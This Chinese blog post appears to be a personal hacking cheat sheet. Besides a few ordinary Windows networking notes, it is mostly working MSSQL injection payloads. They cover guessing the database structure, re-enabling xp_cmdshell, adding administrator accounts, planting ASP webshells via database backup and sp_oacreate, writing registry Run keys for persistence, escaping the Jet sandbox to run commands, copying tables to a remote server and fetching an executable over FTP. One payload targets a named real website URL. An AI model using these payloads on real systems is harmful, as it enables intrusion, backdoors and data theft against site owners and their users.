现在的位置: 首页 > 综合 > 正文

记录点有用的东西

2013年10月20日 ⁄ 综合 ⁄ 共 16786字 ⁄ 字号 评论关闭

rem 压缩网站文件目录,rar的命令行请参看rar帮助
"c:/Program Files/WinRAR/WinRAR.exe" a -as -r -EP1 "d:/chat.rar" "F:/eclipse/workspace/chat/context/*.*"

rar分卷压缩 rar a -v400k -r c:/ttm.zip *.txt

ps.vbe

wscript.echo "PID ProcessName"
for each ps in getobject("winmgmts://./root/cimv2:win32_process").instances_
wscript.echo ps.handle&vbtab&ps.name
next

 

kill process: ntsd -c q -p PID

CREATE%20TABLE%20temp(subdirectory%20nvarchar(256)%20NULL,depth%20tinyint%20NULL,

%20bit%20NULL)--

;truncate table%20temp;Insert%20temp%20exec%20master..xp_dirtree%20'C:/',1,1

create table temp(id int NOT  NULL  IDENTITY  (1,1),paths varchar(1000))--

insert temp exec master.dbo.xp_cmdshell 'dir c: /B/D' --

drop table atemp; CREATE  TABLE  [atemp](ResultTxt  varchar(1024)  NULL);use  master  declare  @o  int  exec  sp_oacreate 'wscript.shell',@o  out  exec  sp_oamethod  @o,'run',NULL,'cmd  /c  Dir  C:/  >  4813.tmp',0,true BULK  INSERT  [atemp]  FROM  '4813.tmp'  WITH  (KEEPNULLS);Alter  Table  [atemp]  add  id  int  NOT  NULL  IDENTITY  (1,1)

drop table atemp; CREATE  TABLE  [atemp](ResultTxt  varchar(1024)  NULL);
use msdb
exec sp_delete_job null,'x'
exec sp_add_job 'x'
exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net user > xx.temp'
exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'
BULK  INSERT  [atemp]  FROM  'xx.temp'  WITH  (KEEPNULLS);Alter  Table  [atemp]  add  id  int  NOT  NULL  IDENTITY  (1,1)

 

2k:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
SQL97:
EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xpsql70.dll'

http://kr.silkroad.54hack.com/sro_board/scboard/sc_list.asp?bID=SB_uTakePart&sID=1'%20and%200=(select%20top%201%20subdirectory%20from%20temp%20);--

test

echo open *****>b.txt&echo abcd>>b.txt&echo 12345>>b.txt&echo get get.exe>>b.txt&echo qui>>b.txt

 

添加默认网关

1.要添加默认网关地址为 192.168.12.1 的默认路由,请键入:

route add 0.0.0.0 mask 0.0.0.0 192.168.12.1

2.C:/>netsh (进入设置模式)

netsh>interface

interface>ip

interface ip>set address "本地连接" static 10.1.1.111 255.255.255.0 10.1.1.254

interface ip>exit

加dns

 add dns name = 〃本地连接〃 addr = 211.97.168.129

WSCRIPT.SHELL 72C24DD5-D70A-438B-8A42-98424B88AFB8
WSCRIPT.NETWORK 093FF999-1EA0-4079-9525-9614C3504B74
Scripting.FileSystemObject 0D43FE01-F093-11CF-8940-00A0C9054228
Scripting.Encoder 32DA2B15-CFED-11D1-B747-00C04FC2B085
Scripting.Dictionary EE09B103-97E0-11CF-978F-00A02463E06F
adodb.stream 00000566-0000-0010-8000-00AA006D2EA4
shell.application 13709620-C279-11CE-A49E-444553540000

1.判断是否有注入
;and 1=1
;and 1=2

2.初步判断是否是mssql
;and user>0

3.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access

4.注入参数是字符
'and [查询条件] and ''='

5.搜索时没过滤参数的
'and [查询条件] and '%25'='

6.猜数据库
;and (Select Count(*) from [数据库名])>0

7.猜字段
;and (Select Count(字段名) from 数据库名)>0

8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构(mssql)
;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--
;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--
;and 1=(SELECT IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,

username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin

username;--
;exec master.dbo.xp_cmdshell 'net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add'

;--
;exec master.dbo.xp_cmdshell 'net user username

password /add';--
;exec master.dbo.xp_cmdshell 'net localgroup

administrators username /add';--

12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree 'c:/'
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not

in('上步得到的paths'))>)

(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器
;insert into temp(id) exec master.dbo.xp_subdirs 'c:/';-- 获得子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';-- 获得所有子目录的目录树结构
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:/web/index.asp';-- 查看文件的内容

13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

'SOFTWARE/Microsoft/Windows/CurrentVersion/Run' 以多个记录集方式返回所有键值
xp_regread 根键,子键,键值名
;exec xp_regread 'HKEY_LOCAL_MACHINE',

'SOFTWARE/Microsoft/Windows/CurrentVersion',

'CommonFilesDir' 返回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

'SOFTWARE/Microsoft/Windows/CurrentVersion',

'TestValueName','reg_sz','hello' 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

'SOFTWARE/Microsoft/Windows/CurrentVersion',

'TestValueName' 删除某个值
xp_regdeletekey 'HKEY_LOCAL_MACHINE',

'SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:/l.asp';

15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<%=server.createobject("wscript.shell").exec("cmd.exe /c "&request("c")).stdout.readall%>');
backup database model to disk='g:/wwwtest/l.asp';

请求的时候,像这样子用:
http://ip/l.asp?c=dir

SQL注入天书 - ASP注入漏洞全接触(小竹)
http://fox.163n.com/xyhack/hhh/list.asp?id=222

MSSQL 跨库查询(臭要饭的!黑夜)
http://fox.163n.com/xyhack/hhh/list.asp?id=66

榨干MS SQL最后一滴血
http://fox.163n.com/xyhack/hhh/list.asp?id=309

SQL语句参考及记录集对象详解
http://fox.163n.com/xyhack/hhh/list.asp?id=124

关于SQL Server中存储过程
http://fox.163n.com/xyhack/hhh/list.asp?id=314

利用 mssql backup 创建webshell
http://fox.163n.com/xyhack/hhh/list.asp?id=219

SQL_Injection高级应用
http://fox.163n.com/xyhack/hhh/list.asp?id=221

跨站式SQL注入(老凯(laokai))
http://fox.163n.com/xyhack/hhh/list.asp?id=383

怪异的SQL注入(AMANL)
http://fox.163n.com/xyhack/hhh/list.asp?id=320

SQL Server应用程序中的高级SQL注入(翻译:青野志狼)
http://fox.163n.com/xyhack/hhh/list.asp?id=338

如何利用Sql 注入遍历目录(sinka QQ:20355)
http://fox.163n.com/xyhack/hhh/list.asp?id=316

SQL Injection技巧的演练(翻译人: demonalex)
http://fox.163n.com/xyhack/hhh/list.asp?id=301

SQL数据库的一些攻击
http://fox.163n.com/xyhack/hhh/list.asp?id=152

SQL Injection攻击技术(JSW)
http://fox.163n.com/xyhack/hhh/list.asp?id=208

SQL_Injection高级应用(apachy)
http://fox.163n.com/xyhack/hhh/list.asp?id=221

SQL注入的不常见方法(桂林老兵)
http://fox.163n.com/xyhack/hhh/list.asp?id=231

Backup a shell
http://fox.163n.com/xyhack/hhh/list.asp?id=274

谈php+mysql注射语句构造(黑嘿黑·≯Super·Hei)
http://fox.163n.com/xyhack/hhh/list.asp?id=386

Advanced SQL Injection with MySQL(angel)
http://fox.163n.com/xyhack/hhh/list.asp?id=405

L'injection (My)SQL via PHP
http://fox.163n.com/xyhack/hhh/list.asp?id=420

Oracle SQL语言
http://fox.163n.com/xyhack/hhh/list.asp?id=206

前提需要工具:SQL Query Analyzer和SqlExec Sunx Version

1.去掉xp_cmdshell扩展过程的方法是使用如下语句:

if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'

2.添加xp_cmdshell扩展过程的方法是使用如下语句:

(1)SQL Query Analyzer

sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

(2)首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入

sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

去除

sp_dropextendedproc 'xp_cmdshell'

(3)MSSQL2000

sp_addextendedproc 'xp_cmdshell','xplog70.dll'

-----------------------------over----------------------------------------

高级SQL Injection技巧(For MSSQL)

 

一、常用注入点

1.http://xxx.xxx.xxx?id=1 and [查询]
select * from table where id=1 and [查询]

2.http://xxx.xxx.xxx?name=test' and [查询] and ''='
select * from table where name='test' and [查询] and ''=''

3.http://xxx.xxx.xxx?query=' and [查询] and '%25'='
select * from table where query like '%' and [查询] and '%'='%'

 

二、猜解当前连接数据库信息

0.判断数据库信息
and 1=(select @@VERSION)

1.判断是否权限
1)服务器角色的成员:
and 1=(IS_SRVROLEMEMBER('sysadmin'))
sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin
2)数据库角色的成员:
and 1=(IS_MEMBER('db_owner'))
3)判断是否支持多句执行
;declare @a int;--

2.得到当前使用库名
and 0<>db_name()

3.得到当前用户名
and user>0

4.得到库名
sysdatabases内dbid为1-6的是系统自建表
and 1=(select name from master.dbo.sysdatabases where dbid=7)
and 1=(select name from master.dbo.sysdatabases where dbid=8)

5.得到表名
and 0<>(select top 1 name from 库名.dbo.sysobjects where xtype=char(85))
and 0<>(select top 1 name from (select top 行数 name from 库名.dbo.sysobjects where xtype='U' order by name asc) as table1 order by name desc)

6.得到字段名
1)得到表的id
and 0<>(select count(*) from 库名.dbo.sysobjects where xtype='U' and name=char(97)%2Bchar(98)%2Bchar(99) and uid>(str(id)))
2)用得到的id查询列
and 0<>(select top 1 name from 库名.dbo.syscolumns where id=235147883)
and 0<>(select top 1 name from (select top 行数 name from 库名.dbo.syscolumns where id=235147883 order by name asc) as table1 order by name desc)

7.得到字段内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from 库名.dbo.表名)
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from 库名.dbo.表名 where 字段名 not in('已得到内容'))
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)

 

三、使用存储过程得到服务器其他信息

0.添加用户
;exec sp_addlogin '用户名', '密码';--
;exec sp_password '旧密码', '新密码', '用户名';--
;exec master.dbo.sp_addsrvrolemember '用户名' 'sysadmin';--
;exec sp_droplogin '用户名';--

1.执行cmd命令
1)恢复
;exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
;exec master.dbo.sp_dropextendedproc 'xp_cmdshell';--
;dbcc addextendedproc ("xp_cmdshell","xplog70.dll");--
2)执行xp_cmdshell
;exec master..xp_cmdshell 'ping 111.222.333.444';--
;declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:/';--
;exec master..xp_cmdshell 'echo 要写入内容>>绝对路径';--
3)回显
;Drop table cmd_list ;CREATE TABLE cmd_list (ComResult nvarchar(8000)) INSERT cmd_list EXEC MASTER..xp_cmdshell 'ipconfig -all';--
and (select char(94)+cast(count(1) as varchar(8000))+char(94) from comd_list where 1=1)>0

2.启动/停止服务
;exec master.dbo.xp_servicecontrol 'start', 'schedule';--

3.利用SP_OAcreate,SP_OAMETHOD执行对象
1)恢复
;exec master.dbo.sp_addextendedproc 'sp_OACreate','odsole70.dll';--
;dbcc addextendedproc ("sp_OACreate","odsole70.dll");--
2)执行
;DECLARE @o INT EXEC SP_OAcreate 'wscript.shell',@o OUT EXEC SP_OAMETHOD @o,'run',null, 'J:/WINDOWS/system32/cmd.exe /c net user aaa3 /add';--
;declare @o int,@f int exec sp_oacreate 'scripting.filesystemobject',@o out exec sp_oamethod @o,'createtextfile',@f out,'j:/foo5.asp',1 exec sp_oamethod @f,'writeline',NULL,'<% set o=server.createobject("wscript.shell")' exec sp_oamethod @f,'writeline',NULL,'o.run(request.querystring("cmd")) %>'

4.浏览目录
1)创建临时表
;create table temp1(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--
2)获得当前所有驱动器
;insert temp1(id,num1,num2,num3) exec master.dbo.xp_availablemedia;--
3)获得当前子目录列表
;insert into temp(id,num1) exec master.dbo.xp_subdirs 'c:/';--
4)获得所有子目录的目录树结构
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:/';--
5)搜索文件
;insert into temp(id) exec master.dbo.xp_cmdshell 'dir c:/ *.asp /s/a';--
6)读取表中内容
and 0<>(select top 1 char(94)%2bCast(字段名 as varchar(8000))%2bchar(94) from (select top 行数 字段名 from 库名.dbo.表名 order by 字段名 asc) as table1 order by 字段名 desc)

5.从文件导入到表中
;create table 表名(line varchar(8000));--
;bulk insert 表名 from '绝对路径';--

6.操作注册表
1)读取整个键exec xp_regenumvalues
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Run';--
2)读取单个键值xp_regread
;drop table temp2;create table temp2(a varchar(1000),b varchar(8000));insert into temp2 exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','CommonFilesDir';--
3)写入单个键值xp_regwrite
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName','REG_SZ','hello';--
;exec master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName','REG_DWORD','6';-- 
4)删除某个值xp_regdeletevalue
;exec master.dbo.xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion','TestValueName';--
5)删除整个键xp_regdeletekey
;exec master.dbo.xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey';--

7.其他信息
xp_msver       返回并允许要查询的 Microsoft SQL Server版本信息。
xp_enumdsn      列举服务器上的ODBC数据源
xp_ntsec_enumdomains 列举服务器可以进入的域
xp_logininfo     报告帐户、帐户类型、帐户的特权级别、帐户的映射登录名和帐户访问 Microsoft SQL Server的权限路径。
sp_configure     检索数据库信息
sp_helpextendedproc  得到所有的存储扩展

 

延伸預存程序的名稱 用途 使用範例
xp_availablemedia 顯示系統上可用的磁碟機,如 C:/。 xp_availablemedia
xp_dirtree 顯示某個目錄下的子目錄與檔案架構。 xp_dirtree 'c:/inetpub/wwwroot/'
xp_enumdsn 列出系統上已經設定好的 ODBC 資料來源名稱(DSN Data Source Name)。 xp_enumdsn
xp_enumgroups 列出作業系統上的使用者群組及該群組的說明。 xp_enumgroups
xp_getfiledetails 獲取某個檔案的相關屬性。 xp_getfiledetails 'C:/Inetpub/wwwroot/SQLInject/login.asp'
dbo.xp_makecab 將目標多個檔案壓縮到某個目標檔案之內。
所有要壓縮的檔案都可以接在參數列的最後方,以逗號隔開。
dbo.xp_makecab
'c:/test.cab','mszip',1,
'C:/Inetpub/wwwroot/SQLInject/login.asp',
'C:/Inetpub/wwwroot/SQLInject/securelogin.asp'
xp_ntsec_enumdomains 列出伺服器的網域名稱。 xp_ntsec_enumdomains
xp_servicecontrol 停掉或啟動某個服務。 xp_servicecontrol 'stop','schedule'
xp_servicecontrol 'start','schedule'
dbo.xp_subdirs 只列某個目錄下的子目錄。 dbo.xp_subdirs 'c:/'
xp_terminate_process 停掉某個執行中的程序,但賦予的參數是 Process ID。
利用”工作管理員”,透過選單「檢視」-「選擇欄位」勾選 pid,就可以看到每個執行程序的 Process ID
xp_terminate_process 2484
xp_unpackcab 解開壓縮檔。 xp_unpackcab 'c:/test.cab','c:/temp',1

四、复制远程数据库(反向连接)
;insert into OPENROWSET('SQLOLEDB', 'uid=sa;pwd=password;Network=DBMSSOCN;Address=111.222.333.444,1433;', 'select * from dest_table') select * from src_table;--

 

 

五、备份数据库
1)首次完整备份
;backup database 库名 to disk='绝对路径';--
2)差异备份,生成文件较小
;backup database 库名 to disk='绝对路径' WITH DIFFERENTIAL,FORMAT;--

 

5、 向启动组中写入命令行和执行程序:
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Windows/CurrentVersion/Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

6、 查看当前的数据库名称:
http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n改成0,1,2,3……就可以跨库了
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--

(3)首先开启jet沙盘模式,通过扩展存储过程xp_regwrite修改注册表实现,管理员修改注册表不能预防的原因。出于安全原因,默认沙盘模式未开启,这就是为什么需要xp_regwrite的原因,而xp_regwrite至少需要DB_OWNER权限,为了方便,这里建议使用sysadmin权限测试:
 exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE/Microsoft/Jet/4.0/Engines','SandBoxMode','REG_DWORD',1
注:
0 禁止一切(默认)
1 使能访问ACCESS,但是禁止其它
2 禁止访问ACCESS,但是使能其他
3 使能一切

 这里仅给出sysadmin权限下使用的命令:
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:/winnt/system32/ias/ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

 建立链接数据库'L0op8ack'参考命令:
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:/windows/system32/ias/ias.mdb'

 如何使用链接数据库:

使用这个方式可以执行,但是很不幸,DB_OWNER权限是不够的,需要至少sysadmin权限或者securityadmin+setupadmin权限组合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
最终发现,还是sa权限或者setupadmin+securityadmin权限帐户才能使用,
一般没有哪个管理员这么设置普通帐户权限的

实用性不强,仅作为一个学习总结吧

大致过程如下,如果不是sysadmin,那么IAS.mdb权限验证会出错,
我测试的时候授予hacker这个用户setupadmin+securityadmin权限,使用ias.mdb失败
需要找一个一般用户可访问的mdb才可以:

 新建链接服务器”L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:/winnt/system32/ias/ias.mdb';--
 exec sp_addlinkedsrvlogin 'L0op8ack','false';--或
exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
 Select * FROM OPENQUERY(L0op8ack, 'Select shell("cmd.exe /c net user")');--
 exec sp_droplinkedsrvlogin 'L0op8ack','false';--
 exec sp_dropserver 'L0op8ack';--

29、普通用户获得WEBSHELL的方法之二:
 打包:
EXEC [master].[dbo].[xp_makecab] 'c:/test.rar','default',1,'d:/cmd.asp'
解包,可以用于得到webshell:
 EXEC [master].[dbo].[xp_unpackcab] 'C:/test.rar','c:',1, 'n.asp'
 读任意文件内容,要求有master的dbo权限:
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:/cmd.asp'

 

31、一些sql中的扩展存储的总结:
xp_availablemedia 显示系统上可用的盘符'C:/' xp_availablemedia
xp_enumgroups 列出当前系统的使用群组及其说明 xp_enumgroups
xp_enumdsn 列出系统上已经设置好的ODBC数据源名称 xp_enumdsn
xp_dirtree 显示某个目录下的子目录与文件架构 xp_dirtree 'C:/inetpub/wwwroot/'
xp_getfiledetails 获取某文件的相关属性 xp_getfiledetails 'C:/inetpub/wwwroot.asp'
dbp.xp_makecab 将目标计算机多个档案压缩到某个档案里所压缩的档案都可以接在参数的后面用豆号隔开 dbp.xp_makecab 'C:/lin.cab','evil',1,'C:/inetpub/mdb.asp'
xp_unpackcab 解压缩 xp_unpackcab 'C:/hackway.cab','C:/temp',1
xp_ntsec_enumdomains 列出服务器域名 xp_ntsec_enumdomains
xp_servicecontrol 停止或者启动某个服务 xp_servicecontrol 'stop','schedule'
xp_terminate_process 用pid来停止某个执行中的程序 xp_terminate_process 123
dbo.xp_subdirs 只列某个目录下的子目录 dbo.xp_subdirs 'C:/'

 

★Dbcc的一个用法
扩展储存过程被删除以后可以有很简单的办法恢复:
比如:
删除
DROP PROCEDURE sp_addextendedproc
DROP PROCEDURE sp_OACreate
exec sp_dropextendedproc 'xp_cmdshell'
恢复
dbcc addextendedproc ("sp_OACreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
这样可以直接恢复,不用去管sp_addextendedproc是不是存在

XP的各种网络命令
1、net系列命令
2、TCP/IP命令
3、netsh工具
一、net系列命令
net help
net send
net start

1.1 网络信使
net send  注意不能跨网段
net stop messenger 停止信使服务,也可以在“服务”修改 net start messenger 开始信使服务
1.2 在网络邻居上隐藏你的计算机
net config server /hidden:yes
net config server /hidden:no 则为开启

二、TCP/IP命令
ipconfig
arp
netstat
ping
nslookup
tracert
route

三、netsh工具
netsh.exe可以用来配置TCP/IP设置:IP地址、子网掩码、默认网关、DNS和WINS地址和其他选项。
3.1 显示TCP/IP设置
netsh interface ip show config

3.2 配置IP地址
netsh interface ip set address name=“本地连接" static 192.168.0.100 255.255.255.0 192.168.0.1 1

3.3 export your current IP settings
netsh -c interface dump > c:/location1.txt

3.4 import your IP settings
netsh -f c:/location1.txt
或者是  netsh exec c:/location2.txt

3.5 自动获得IP地址和DNS地址
netsh interface ip set address “本地连接” dhcp
netsh interface ip set dns “本地连接” dhcp

3.6 configure DNS and WINS addresses
netsh interface ip set dns “本地连接" static 192.168.0.200
netsh interface ip set wins “本地连接" static 192.168.0.200

http://www.petri.co.il/configure_tcp_ip_from_cmd.htm

抱歉!评论已关闭.